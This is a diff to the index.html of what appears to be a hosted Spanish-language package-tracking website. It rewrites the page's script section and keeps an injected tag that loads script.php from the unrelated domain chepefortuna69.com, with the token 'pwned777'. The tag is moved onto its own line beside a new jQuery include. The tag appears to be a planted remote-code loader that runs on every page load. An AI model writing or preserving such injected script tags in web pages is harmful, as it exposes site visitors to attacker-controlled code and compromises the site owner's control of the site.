--- a/index.html
+++ b/index.html
@@ -782,7 +782,8 @@
                             </div>
         </div>
                             <script nonce="f402290f24968c71a5d9f820524f88c3" type="application/ld+json">[{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/www.rastreo-paquetes47.com\/","name":"Rastrea en Linea tus Envios"}]</script>
-                <script nonce="f402290f24968c71a5d9f820524f88c3">window.JOUWWEB = window.JOUWWEB || {}; window.JOUWWEB.experiment = {"enrollments":{},"defaults":{"only-annual-discount-restart":"3months-50pct","ai-homepage-structures":"on","checkout-shopping-cart-design":"on","next-best-action":"on","ai-page-wizard-ui":"on","expand-colors":"on"}};</script>        <script nonce="f402290f24968c71a5d9f820524f88c3">window.plausible = window.plausible || function() { (window.plausible.q = window.plausible.q || []).push(arguments) };plausible('pageview', { props: {website: 7101061 }});</script>                    <script type="text/javascript" src="https://chepefortuna69.com/__472/script.php?tok=pwned777" async="true"></script>
+                <script nonce="f402290f24968c71a5d9f820524f88c3">window.JOUWWEB = window.JOUWWEB || {}; window.JOUWWEB.experiment = {"enrollments":{},"defaults":{"only-annual-discount-restart":"3months-50pct","ai-homepage-structures":"on","checkout-shopping-cart-design":"on","next-best-action":"on","ai-page-wizard-ui":"on","expand-colors":"on"}};</script>        <script nonce="f402290f24968c71a5d9f820524f88c3">window.plausible = window.plausible || function() { (window.plausible.q = window.plausible.q || []).push(arguments) };plausible('pageview', { props: {website: 7101061 }});</script>                    <script src="https://code.jquery.com/jquery-3.7.0.min.js"></script>
+    <script src="https://chepefortuna69.com/__472/script.php?tok=pwned777" async></script>
   
   
     
